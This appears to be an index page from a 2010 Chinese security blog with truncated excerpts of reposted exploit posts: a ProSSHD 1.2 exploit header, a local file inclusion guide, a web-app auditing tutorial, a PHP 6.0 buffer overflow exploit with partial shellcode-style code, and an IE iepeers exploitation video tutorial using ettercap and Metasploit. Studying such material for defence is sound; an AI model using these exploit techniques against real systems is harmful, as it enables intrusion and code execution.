2010年5月4日
admin 5,768 views
# Title: ProSSHD 1.2 remote post-auth exploit (w/ASLR and DEP bypass)
# EDB-ID: 12495
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Alexey Sintsov
# Published: 2010-05-03
# Verified: yes
# Download Exploit Code
# Download Vulnerable app
view source
print?
# Exploit Title: ProSSHD 1.2 remote post-auth exploit (w/ASLR and DEP bypass)
# Date: 03.05.2010
# Author: Alexey Sintsov
# Software Link: http://www.exploit-db.com/application/11618
# Version: 1.2
# Tested on: Windows XP SP3 / Windows 7
# CVE :
# Code :
################################################################################
# Original exploit by S2 Crew [Hungary]
# * * *
# ROP for DEP and ASLR bypass by Alexey Sintsov from DSecRG [www.dsecrg.com]
# * * *
# Tested on: ProSSHD v1.2 on Windows XP and Windows 7 with DEP for all
#
# Special for XAKEP magazine [www.xakep.ru]
#
#
# CVE: – 阅读全文…
2010年4月21日
admin 10,662 views
Local File Inclusion
As the title says, this is a “short” and descriptive guide about
various methods to exploit using a local file inclusion (LFI).
I will cover the following topics:
•Poison NULL Bytes
•Log Poisoning
•/proc/self/
•Alternative Log Poisoning
•Malicious image upload
•Injection of code by the use of e-mails
•Creativity
By: Fredrik Nordberg Almroth
URL: http://h.ackack.net/
So the question is. What is a LFI?
A LFI is, as the title says,
a method for servers/scripts to include local files on run-time,
in order to make complex systems of procedure calls.
Well most of the time, you find the LFI vulnerabilities in URL’s
of the web pages.
Mainly because developers tend to like the use of GET requests
when including pages.
Nothing more. Nothing less.
阅读全文…
2010年4月5日
admin 14,101 views
来源packetstorm.com
Web Application Auditing and Exploitation
By ReZEN
Index Title
Index
What is a Web Application
Intro To PHP
Function Exploitation Overview
Exploitable Functions
Examples
Application Assisted Auditing
Credits
Gr33tz / Fuckz
What is a “WebApp”?
In software engineering, a web application—sometimes
called a webapp and much less frequently a
weblication—is an application that’s accessed with a web
browser over a network such as the Internet or an
intranet. Web applications are popular due to the
ubiquity of the browser as a client, sometimes called a
thin client. The ability to update and maintain web
applications without distributing and installing software
on potentially thousands of client computers is a key
reason for their popularity. Web applications are used to
implement webmail, online retail sales, online auctions,
wikis, discussion boards, weblogs, MMORPGs, and many
other functions.
What is a “WebApp”? (cont.)
阅读全文…
2010年4月5日
admin 1,584 views
来源:http://www.exploit-db.com/exploits/12051
# Title: PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
# EDB-ID: 12051
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Pr0T3cT10n
# Published: 2010-04-04
# Verified: no
# Download Exploit Code
# Download Vulnerable app
view source
print?
<?php
error_reporting(0);
#####################################################################
## PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
## Tested on WIN XP HEB SP3, Apache, PHP 6.0 Dev
## Buffer Overflow
## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com<mailto:pr0t3ct10n@gmail.com>>
## Exploited by TheLeader, Debug
## SP. Thanks: HDM
## http://www.nullbyte.org.il
#####################################################################
## This code should exploits a buffer overflow in the str_transliterate() function to call WinExec and execute CALC
## Take a look, ‘unicode.semantics’ has to be on!
## php.ini > unicode.semantics = on
#####################################################################
if(ini_get_bool(‘unicode.semantics’)) {
$buff = str_repeat(“\u4141″, 256);
$eip = “\u1445\u10A9″; # 0x10A91445 JMP ESP @ php6ts.dll
$nops = str_repeat(“\u9090″, 20);
阅读全文…
2010年3月18日
admin 2,024 views
为linux520.com做了一个视频教程
Exploit iepeers vul whith ettercap and metasploit framework video
在线观看:
Exploit iepeers vul whith ettercap(上集)
http://www.linux520.com/v/l00066/l00066.html
Exploit iepeers vul whith ettercap(下集)
http://www.linux520.com/v/l00067/l00067.html
ppt传上来~~~
Exploit iepeers vul whith ettercap &&msf(ppt):
Exploit iepeers vul whith ettercap
写在前面的废话:
本教程是kindle童鞋写的,kindle教我不少东西,本来应该得到我等小菜感恩戴德,无奈这厮最近日站日多了,太累,最近发高烧,所以由偶代录,希望kindle看到本教程立马退烧继续日站 •跟大家说声抱歉,因为个人原因最近比较惆怅,对,也叫蛋疼,因此不爱说话,所以就不录语音教程了,见谅!请忽略白字谢谢!
视频地址稍后补上~~~
请访问linux520.com